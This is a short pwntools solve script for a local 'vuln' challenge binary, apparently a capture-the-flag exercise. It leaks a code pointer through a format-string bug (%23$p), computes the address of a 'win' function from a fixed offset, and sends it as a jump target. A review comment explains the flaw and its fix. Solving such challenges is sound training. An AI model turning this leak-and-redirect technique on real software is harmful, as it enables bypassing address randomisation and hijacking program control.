#!/usr/bin/python3
"""Solve script for the local ./vuln challenge binary (pwntools).

Flow, as written below:
  1. Answer the first ":" prompt with the format directive %23$p and parse
     the echoed pointer, which the script treats as the runtime address
     of main.
  2. Subtract the fixed offset 0x96 to get the address the script calls win.
  3. Answer the next ":" prompt with that address as hex text.

NOTE(review): the leak presumably works because the target hands user
input to a printf-style call as the format string, which discloses a code
pointer and so cancels address randomisation for the binary; a constant
format string (printf("%s", buf)) plus -Wformat -Wformat-security closes
it. The second prompt appears to accept a raw jump target (the original
comment says "jmp") -- confirm against the target's source.
"""
from pwn import *

# Setting context.binary lets the bare process() call below launch ./vuln.
context.binary = elf = ELF("./vuln", checksec=False)
io = process()


def send_after_prompt(payload):
    """Wait for the next b":" in the output, then send payload plus newline."""
    return io.sendlineafter(b":", payload)


# Leak: positional argument 23 rendered with %p. The index and the 0x96
# offset below are specific to this build of the binary.
send_after_prompt(b"%23$p")
leaked_main = int(io.recvline(), 16)
log.info("main: %#x", leaked_main)

win_addr = leaked_main - 0x96
log.info("win: %#x", win_addr)

# Second prompt: the computed address goes out as "0x..." text.
send_after_prompt(hex(win_addr).encode())

io.interactive()